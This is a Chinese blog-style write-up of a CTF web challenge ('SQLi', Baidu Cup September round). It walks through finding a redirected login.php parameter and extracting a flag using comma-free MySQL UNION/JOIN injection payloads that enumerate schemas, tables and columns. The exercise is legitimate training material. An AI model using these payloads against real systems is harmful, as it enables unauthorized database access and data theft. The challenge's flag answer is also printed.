“百度杯”CTF比赛 九月场 类型：Web 题目名称：SQLi ---不需要逗号的注入技巧

今天在i春秋做题的时候遇到了一道非常好的题目，于是在参考了wp的基础上自己复现了一遍，算作一种技巧的学习与收藏吧。

题目i春秋连接：https://www.ichunqiu.com/battalion?t=1&r=54791

访问地址，发现什么都没有，



查看页面源代码，发现提示



访问地址

http://69ef94c7ef5e47b580ed5c7bae472bc4c3b492503f964143.game.ichunqiu.com/login.php?id=1

得到下面页面



我去，不会这就注入进去了吧？！话不多说，上sqlmap，



尝试了好多次，发现这就是个假的注入点，果然没那么简单啊，，，，

设置代理，利用工具Burp Suite看看究竟发生了什么，，，

可以看到在访问地址

http://69ef94c7ef5e47b580ed5c7bae472bc4c3b492503f964143.game.ichunqiu.com的时候，302，页面重定向了。

注意看，下面两个图片





在302重定向回复报文中，url已经改变，原来箭头那里是3l,被重定向到31，6不6，哈哈。并且看到了新的页面地址l0gin.php?id=1

访问地址

http://69ef94c7ef5e47b580ed5c7bae472bc4c3b492503f964143.game.ichunqiu.com/l0gin.php?id=1

得到下图



修改参数，再次执行，



OK，看来这个确实是一个注入点，再用sqlmap测试，从结果可以看到这既是一个基于布尔的盲注，也是一个基于时间的盲注



接着爆数据库，发现无法得到，没办法，只能手工注入了，

这里我选择基于布尔的盲注，因为这样的回显比基于时间的看起来明显。

输入参数

1' and ascii(substr((select database()),1,1))>64 %23

查询数据库名，发现，注入失败，并且,后面的sql语句被过滤掉了，id字段输出的应该就是过滤后的sql语句了



从网上看到一篇讲不需要逗号的mysql注入文章，http://wonderkun.cc/index.html/?p=442

于是重新构造payload，如id=-1' union select * from (select
group_concat(distinct(table_schema)) from information_schema.tables ) a
join (select version() ) b %23

可以看到数据库名称为sqli



紧接着，构造payload，获取表名

-1' union select * from (select group_concat(distinct(table_name))
from information_schema.tables where table_schema='sqli') a join
(select version() ) b %23



构造payload，获取字段名

-1' union select * from (select
group_concat(distinct(column_name)) from information_schema.columns
where table_schema='sqli' and table_name='users') a join (select
version() ) b %23



构造payload，获取字段值，得到flag{34303304-de0b-4bad-a0df-84eb8a420df8}

-1' union select * from (select group_concat(distinct(flag_9c861b688330)) from users) a join (select version() ) b %23